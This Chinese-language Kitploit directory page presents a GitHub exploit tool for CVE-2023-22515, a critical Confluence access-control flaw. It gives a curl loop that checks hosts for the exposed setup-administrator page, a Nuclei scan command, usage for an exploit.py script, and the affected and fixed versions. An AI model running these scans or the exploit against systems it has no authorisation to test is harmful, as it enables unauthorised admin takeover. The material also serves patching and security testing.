Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2023-22515 — CVE-2023-22515 - Confluence Data Center 和 Server 中的访问控制失效漏洞 | Kitploit
工具/GitHubGitHub/kh4sh3i/cve-2023-22515
漏洞分析漏洞利用Web应用程序漏洞利用信息收集渗透测试错误配置
GitHubkh4sh3i/cve-2023-22515

CVE-2023-22515

CVE-2023-22515 - Confluence Data Center 和 Server 中的访问控制失效漏洞

查看仓库
512个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享



CVE-2023-22515

CVE-2023-22515,一个影响 Confluence Server 和 Confluence Data Center 本地部署实例的严重漏洞,属于访问控制缺陷。Atlassian 给出的 CVSS 基础评分为 10.0

单行 PoC

root@kitploit:~
cat file.txt| while read host do;do curl -skL "http://$host/setup/setupadministrator.action" | grep -i "<title>Setup System Administrator" && echo $host "is VULN";done

Nuclei

root@kitploit:~
nuclei -u target -t CVE-2023-22515.yaml

前置条件

root@kitploit:~
sudo pip install -r requirements.txt

使用方法

root@kitploit:~
sudo python3 exploit.py --url [target]

受影响版本

root@kitploit:~
8.0.0
8.0.1
8.0.2
8.0.3
8.0.4
8.1.0
8.1.1
8.1.3
8.1.4
8.2.0
8.2.1
8.2.2
8.2.3
8.3.0
8.3.1
8.3.2
8.4.0
8.4.1
8.4.2
8.5.0
8.5.1

修复版本

root@kitploit:~
8.3.3 或更高版本
8.4.3 或更高版本
8.5.2(长期支持版本)或更高版本

参考

  • atlassian
  • nist
下载工具